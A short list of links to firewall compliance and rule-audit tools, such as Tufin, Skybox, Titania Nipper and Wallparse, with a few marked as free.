https://www.manageengine.com/products/firewall/firewall-compliance-management.html
https://www.tufin.com/features/compliance-audit-readiness
https://www.skyboxsecurity.com/products/skybox-firewall-assurance
https://www.titania.com/products/nipper/
https://www.solarwinds.com/free-tools/firewall-browser (free & commercial)
https://www.niiconsulting.com/Firesec.html
https://www.wallparse.com/ (free)